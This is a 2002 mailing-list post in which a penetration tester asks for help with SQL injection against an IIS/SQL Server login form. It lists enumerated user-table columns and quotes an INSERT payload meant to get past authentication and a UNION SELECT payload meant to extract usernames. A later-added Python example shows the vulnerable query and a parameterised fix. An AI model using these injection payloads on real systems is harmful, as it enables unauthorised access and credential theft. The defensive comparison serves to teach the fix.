Penetration Testing: sql table data enumeration help please.

From: Gary O'leary-Steele <GaryO_at_sec-1.com>
Date: Thu, 9 May 2002 20:47:43 +0100

Hi all,

I am currently performing a pen test against a web server using IIS with SQL
integration. There is a user name and password form which I want to bypass
and enumerate existing usernames and passwords.

I have discovered the following columns/table data:

tblusers.ID uniqueidentifier
tblusers.createdtimestamp smalldatetime
tblusers.sessionID nvarchar
tblUsers.LastUpdated smalldatetime
tblUsers.LastUpdatedIP nvarchar
tblUsers.LastUpdatedBy uniqueidentifier
tblUsers.CompanyType nvarchar
tblUsers.CompanyID uniqueidentifier
tblUsers.Password nvarchar
tblUsers.UserName nvarchar
tblUsers.Title nvarchar
tblUsers.Surname nvarchar
tblUsers.Forename nvarchar
tblUsers.AddressTo nvarchar
tblUsers.Appointment nvarchar
tblUsers.DirectPhone nvarchar
tblUsers.Mobile nvarchar
tblUsers.DirectEmail nvarchar
tblUsers.DirectFax nvarchar
tblUsers.Signature The text, ntext, and image data types are invalid in
this subquery or aggregate expression.
tblUsers.Address1 nvarchar
tblUsers.Address2 nvarchar
tblUsers.Address3 nvarchar
tblUsers.Address4 nvarchar
tblUsers.Address5 nvarchar
tblUsers.PostCode nvarchar
tblUsers.HomePhone nvarchar
tblUsers.UserAccess bit

I want to update the table to bypass the auth screen.

I have tried:

-------------
www.target.comUserName='insert into
tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,
CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App
ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address
2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31
2000
8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar
y','addrto','appointment','01131234567','07796698919','garyo_at_sec-1.com',0113
1234567','sig','123','456','ls287sr','01132297541',1)--

------------

But had no joy.

In an attempt to gain access to data held with the username and password
fields I have tried

www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from
tblusers where username >'a'--&password=hacker

but get "Operand type clash: uniqueidentifier is incompatible with int"

Any help would be greatly appreciated.

Received on May 09 2002
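
Added example, not part of the original post or of the application under test: the user lookup behind a login form written two ways, showing why the UserName value quoted in the post gets database errors back from a concatenated query and gets only a generic failure from a bound parameter. Assumptions: sqlite3 stands in for the SQL Server back end, the function names and the sample row are constructed for illustration, and password verification is left out.

```python
import logging
import sqlite3

GENERIC = "Invalid user name or password."

# Request value quoted from the post's UserName parameter.
POSTED = "'Union select 1,1,1,1,1,1,1,1,min(UserName) from tblusers where username >'a'--"

def make_db():
    # sqlite3 stands in for the SQL Server back end (assumption).
    # Column names come from the post; the row is constructed sample data.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblUsers (ID TEXT PRIMARY KEY, UserName TEXT UNIQUE)")
    db.execute("INSERT INTO tblUsers VALUES (?, ?)",
               ("00000000-0000-0000-0000-000000000001", "alice"))
    return db

def lookup_concat(db, username):
    """'Before': input spliced into the SQL text, driver errors echoed back."""
    sql = "SELECT ID FROM tblUsers WHERE UserName='" + username + "'"
    try:
        return db.execute(sql).fetchone() is not None, ""
    except sqlite3.Error as exc:
        return False, str(exc)  # parser and type errors reach the client

def lookup_param(db, username):
    """'After': input bound as a parameter, one generic failure message."""
    if not isinstance(username, str) or not 1 <= len(username) <= 256:
        return False, GENERIC
    try:
        row = db.execute("SELECT ID FROM tblUsers WHERE UserName = ?",
                         (username,)).fetchone()
    except sqlite3.Error:
        logging.exception("user lookup failed")  # detail stays server-side
        return False, GENERIC
    return (True, "") if row else (False, GENERIC)

if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concat, lookup_param):
        # A real user, a legitimate name containing a quote, and the posted value.
        for value in ("alice", "o'leary", POSTED):
            print(fn.__name__, repr(value[:20]), fn(db, value))
```

The concatenated version also fails on an ordinary surname containing an apostrophe, which is often the first visible symptom of this class of bug in production logs.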